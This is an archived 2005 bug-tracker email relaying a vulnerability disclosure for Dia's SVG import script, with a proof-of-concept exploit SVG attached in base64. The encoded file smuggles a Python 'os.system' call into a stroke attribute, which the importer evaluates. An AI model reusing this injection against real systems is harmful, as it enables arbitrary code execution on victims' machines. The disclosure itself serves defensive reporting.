[Bug 16687] dia: Arbitrary code execution when importing a .svg file
bugzilla-daemon at bugzilla.ubuntu.com
bugzilla-daemon at bugzilla.ubuntu.com
Fri Sep 30 11:01:46 UTC 2005
Please do not reply to this email. You can add comments at
http://bugzilla.ubuntu.com/show_bug.cgi?id=16687
Ubuntu | dia
------- Additional Comments From debzilla at ubuntu.com 2005-09-30 12:01 UTC -------
Message-Id: <1128076797.29351.3.camel at localhost.localdomain>
Date: Fri, 30 Sep 2005 12:39:56 +0200
From: Joxean Koret <joxeankoret at yahoo.es>
To: submit at bugs.debian.org
Subject: dia: Arbitrary code execution when importing a .svg file
--=-H5eZNNjRimc+GR+VYr2n
Content-Type: multipart/mixed; boundary="=-OoraigSvbdbpb3oILWTd"
--=-OoraigSvbdbpb3oILWTd
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Subject: dia: Arbitrary code execution when importing a .svg file
Package: dia
Severity: grave
Justification: user security hole
The script diasvg_import.py that comes with the current Debian stable
version of Dia is vulnerable to an arbitrary code execution.
I tried to contact with the Dia team too many times but without any look
so, I think, there is no patch at the moment for the issues.
Attached goes a working exploit to test the vulnerability.
Regards,
Joxean Koret
-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-386
Locale: LANG=3Des_ES at euro, LC_CTYPE=3Des_ES at euro (charmap=3DISO-8859-15)
--=-OoraigSvbdbpb3oILWTd
Content-Disposition: attachment; filename=exploit.svg
Content-Type: image/svg+xml; name=exploit.svg
Content-Transfer-Encoding: base64
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+Cjwh
LS0gQ3JlYXRlZCB3aXRoIElua3NjYXBlIChodHRwOi8vd3d3Lmlua3NjYXBlLm9yZy8pIC0tPgo8
c3ZnCiAgIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIKICAgeG1s
bnM6Y2M9Imh0dHA6Ly93ZWIucmVzb3VyY2Uub3JnL2NjLyIKICAgeG1sbnM6cmRmPSJodHRwOi8v
d3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIgogICB4bWxuczpzdmc9Imh0dHA6
Ly93d3cudzMub3JnLzIwMDAvc3ZnIgogICB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9z
dmciCiAgIHhtbG5zOnNvZGlwb2RpPSJodHRwOi8vaW5rc2NhcGUuc291cmNlZm9yZ2UubmV0L0RU
RC9zb2RpcG9kaS0wLmR0ZCIKICAgeG1sbnM6aW5rc2NhcGU9Imh0dHA6Ly93d3cuaW5rc2NhcGUu
b3JnL25hbWVzcGFjZXMvaW5rc2NhcGUiCiAgIHNvZGlwb2RpOmRvY25hbWU9ImJhc2Uuc3ZnIgog
ICBzb2RpcG9kaTpkb2NiYXNlPSIvaG9tZS9qb3hlYW4vc21iNGsvam94ZWFuL2RhdGEvam94ZWFu
L2Fkdmlzb3JpZXMvMjAwNS9kaWEiCiAgIGlua3NjYXBlOnZlcnNpb249IjAuNDEiCiAgIHNvZGlw
b2RpOnZlcnNpb249IjAuMzIiCiAgIGlkPSJzdmcyIgogICBoZWlnaHQ9IjI5N21tIgogICB3aWR0
aD0iMjEwbW0iPgogIDxkZWZzCiAgICAgaWQ9ImRlZnMzIiAvPgogIDxzb2RpcG9kaTpuYW1lZHZp
ZXcKICAgICBpbmtzY2FwZTp3aW5kb3cteT0iMCIKICAgICBpbmtzY2FwZTp3aW5kb3cteD0iMCIK
ICAgICBpbmtzY2FwZTp3aW5kb3ctaGVpZ2h0PSI1NDAiCiAgICAgaW5rc2NhcGU6d2luZG93LXdp
ZHRoPSI2NDAiCiAgICAgaW5rc2NhcGU6Y3VycmVudC1sYXllcj0ibGF5ZXIxIgogICAgIGlua3Nj
YXBlOmRvY3VtZW50LXVuaXRzPSJweCIKICAgICBpbmtzY2FwZTpjeT0iNTIwLjAwMDAwIgogICAg
IGlua3NjYXBlOmN4PSIzNzUuMDAwMDAiCiAgICAgaW5rc2NhcGU6em9vbT0iMC4zNTAwMDAwMCIK
ICAgICBpbmtzY2FwZTpwYWdlc2hhZG93PSIyIgogICAgIGlua3NjYXBlOnBhZ2VvcGFjaXR5PSIw
LjAiCiAgICAgYm9yZGVyb3BhY2l0eT0iMS4wIgogICAgIGJvcmRlcmNvbG9yPSIjNjY2NjY2Igog
ICAgIHBhZ2Vjb2xvcj0iI2ZmZmZmZiIKICAgICBpZD0iYmFzZSIgLz4KICA8bWV0YWRhdGEKICAg
ICBpZD0ibWV0YWRhdGE0Ij4KICAgIDxyZGY6UkRGCiAgICAgICBpZD0iUkRGNSI+CiAgICAgIDxj
YzpXb3JrCiAgICAgICAgIGlkPSJXb3JrNiIKICAgICAgICAgcmRmOmFib3V0PSIiPgogICAgICAg
IDxkYzpmb3JtYXQKICAgICAgICAgICBpZD0iZm9ybWF0NyI+aW1hZ2Uvc3ZnK3htbDwvZGM6Zm9y
bWF0PgogICAgICAgIDxkYzp0eXBlCiAgICAgICAgICAgcmRmOnJlc291cmNlPSJodHRwOi8vcHVy
bC5vcmcvZGMvZGNtaXR5cGUvU3RpbGxJbWFnZSIKICAgICAgICAgICBpZD0idHlwZTkiIC8+CiAg
ICAgIDwvY2M6V29yaz4KICAgIDwvcmRmOlJERj4KICA8L21ldGFkYXRhPgogIDxnCiAgICAgaWQ9
ImxheWVyMSIKICAgICBpbmtzY2FwZTpncm91cG1vZGU9ImxheWVyIgogICAgIGlua3NjYXBlOmxh
YmVsPSJMYXllciAxIgogICAgIHN0cm9rZT0ibGF5ZXIxJnF1b3Q7KStfX2ltcG9ydF9fKCdvcycp
LnN5c3RlbSgndG91Y2ggL3RtcC9kaWFfc3ZnX2ltcG9ydF9leHBsb2l0Jykrc3RyKCZxdW90OyI+
CiAgICA8cmVjdAogICAgICAgeT0iMTAzLjc5MDc2IgogICAgICAgeD0iNDIuODU3MTQzIgogICAg
ICAgaGVpZ2h0PSI4NDguNTcxNDEiCiAgICAgICB3aWR0aD0iNjU3LjE0Mjg4IgogICAgICAgaWQ9
InJlY3QxMjkxIgogICAgICAgc3R5bGU9ImZpbGw6IzAwMDBmZjtmaWxsLW9wYWNpdHk6MC43NTAw
MDAwMDtmaWxsLXJ1bGU6ZXZlbm9kZDtzdHJva2U6IzAwMDAwMDtzdHJva2Utd2lkdGg6MS4wMDAw
MDAwcHg7c3Ryb2tlLWxpbmVjYXA6YnV0dDtzdHJva2UtbGluZWpvaW46bWl0ZXI7c3Ryb2tlLW9w
YWNpdHk6MS4wMDAwMDAwIiAvPgogICAgPHBhdGgKICAgICAgIGQ9Ik0gNjQ4LjU3MTQ0IDU0Mi4z
NjIxOCBBIDI2OC41NzE0NCAzMDQuMjg1NzEgMCAxIDEgIDExMS40Mjg1Niw1NDIuMzYyMTggQSAy
NjguNTcxNDQgMzA0LjI4NTcxIDAgMSAxICA2NDguNTcxNDQgNTQyLjM2MjE4IHoiCiAgICAgICBz
b2RpcG9kaTpyeT0iMzA0LjI4NTcxIgogICAgICAgc29kaXBvZGk6cng9IjI2OC41NzE0NCIKICAg
ICAgIHNvZGlwb2RpOmN5PSI1NDIuMzYyMTgiCiAgICAgICBzb2RpcG9kaTpjeD0iMzgwLjAwMDAw
IgogICAgICAgaWQ9InBhdGgxMjkzIgogICAgICAgc3R5bGU9ImZpbGw6I2ZmMDAwMDtmaWxsLW9w
YWNpdHk6MC43NTAwMDAwMDtmaWxsLXJ1bGU6ZXZlbm9kZDtzdHJva2U6IzAwMDAwMDtzdHJva2Ut
d2lkdGg6MS4wMDAwMDAwcHg7c3Ryb2tlLWxpbmVjYXA6YnV0dDtzdHJva2UtbGluZWpvaW46bWl0
ZXI7c3Ryb2tlLW9wYWNpdHk6MS4wMDAwMDAwIgogICAgICAgc29kaXBvZGk6dHlwZT0iYXJjIiAv
PgogICAgPHBhdGgKICAgICAgIHRyYW5zZm9ybT0ibWF0cml4KDAuMDAwMDAwLC0xLjAwMDAwMCwt
MS4wMDAwMDAsMC4wMDAwMDAsOTUwLjk4NzMsOTQ1LjI3MjkpIgogICAgICAgZD0iTSAzODAuMDAw
MDAsNTQ5LjUwNTA3IEMgMzgxLjI4OTI4LDU2MS41MzgyOCAzNjQuNDE1NTUsNTU3LjE3OTc2IDM2
MC4wMDAwMCw1NTEuNjQ3OTQgQyAzNDguMDM0MTQsNTM2LjY1NzA1IDM2MC43NDcxOSw1MTYuMDk3
NzAgMzc1LjcxNDI1LDUwOS41MDUwNyBDIDQwMi40ODY4MCw0OTcuNzEyNDAgNDMxLjU1OTUzLDUx
Ny4yNDcyNCA0NDAuMDAwMDAsNTQzLjA3NjQ0IEMgNDUyLjM4NjczLDU4MC45ODE4MyA0MjUuMjU5
MjIsNjE5LjU2NTY4IDM4OC41NzE1MCw2MjkuNTA1MDYgQyAzMzkuNjcyNTQsNjQyLjc1MjY5IDI5
MS4zMDQ3OSw2MDcuNzc2MzcgMjgwLjAwMDAxLDU2MC4yMTk0NCBDIDI2NS43NzQwOSw1MDAuMzcz
OTAgMzA4LjcwODYxLDQ0Mi4xMDkyNyAzNjcuMTQyNzUsNDI5LjUwNTA3IEMgNDM3LjkxNDMyLDQx
NC4yMzk3MCA1MDYuMTM0MDIsNDY1LjE4ODUwIDUxOS45OTk5OSw1MzQuNTA0OTQgQyA1MzYuMzQw
NTYsNjE2LjE5MTk4IDQ3Ny4zNDUwMyw2OTQuNDAwODUgMzk3LjE0MzAwLDcwOS41MDUwNiBDIDMw
NC41NDY1OCw3MjYuOTQzNDUgMjE2LjMyNjc0LDY1OS44ODA3MyAyMDAuMDAwMDEsNTY4Ljc5MDk0
IEMgMTgxLjQ0ODU1LDQ2NS4yODg5MyAyNTYuNTkyMjAsMzY3LjA0MzMxIDM1OC41NzEyNSwzNDku
NTA1MDggQyA0NzIuOTc2MzQsMzI5LjgyOTgzIDU4MS4yNTgyNiw0MTMuMDY0MDUgNTk5Ljk5OTk5
LDUyNS45MzM0NCBDIDYyMC44MDY4Niw2NTEuMjM5ODcgNTI5LjQ3NTAyLDc2OS41NjU4NSA0MDUu
NzE0NTAsNzg5LjUwNTA1IgogICAgICAgc29kaXBvZGk6dDA9IjAuMDAwMDAwMCIKICAgICAgIHNv
ZGlwb2RpOmFyZ3VtZW50PSItMTcuMzg1NDk2IgogICAgICAgc29kaXBvZGk6cmFkaXVzPSIyNDEu
MzczNjMiCiAgICAgICBzb2RpcG9kaTpyZXZvbHV0aW9uPSIzLjAwMDAwMDAiCiAgICAgICBzb2Rp
cG9kaTpleHBhbnNpb249IjEuMDAwMDAwMCIKICAgICAgIHNvZGlwb2RpOmN5PSI1NDkuNTA1MDci
CiAgICAgICBzb2RpcG9kaTpjeD0iMzgwLjAwMDAwIgogICAgICAgaWQ9InBhdGgxMjk3IgogICAg
ICAgc3R5bGU9ImZpbGw6bm9uZTtmaWxsLW9wYWNpdHk6MC43NTAwMDAwMDtmaWxsLXJ1bGU6ZXZl
bm9kZDtzdHJva2U6IzAwMDAwMDtzdHJva2Utd2lkdGg6MS4wMDAwMDAwcHg7c3Ryb2tlLWxpbmVj
YXA6YnV0dDtzdHJva2UtbGluZWpvaW46bWl0ZXI7c3Ryb2tlLW9wYWNpdHk6MS4wMDAwMDAwIgog
ICAgICAgc29kaXBvZGk6dHlwZT0ic3BpcmFsIiAvPgogIDwvZz4KPC9zdmc+Cg==
--=-OoraigSvbdbpb3oILWTd--
--=-H5eZNNjRimc+GR+VYr2n
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
digitalmente
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQBDPRX8U6rFMEYDrlERAnHeAJ4zS0uhOSeyGVrRostmXhfJ4NVt3ACdFtOF
f+TFXB2bWtBmwk3N6eUk+ng=
=wdJ2
-----END PGP SIGNATURE-----
--=-H5eZNNjRimc+GR+VYr2n--
--
Configure bugmail: http://bugzilla.ubuntu.com/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the QA contact for the bug, or are watching the QA contact.
More information about the desktop-bugs
mailing list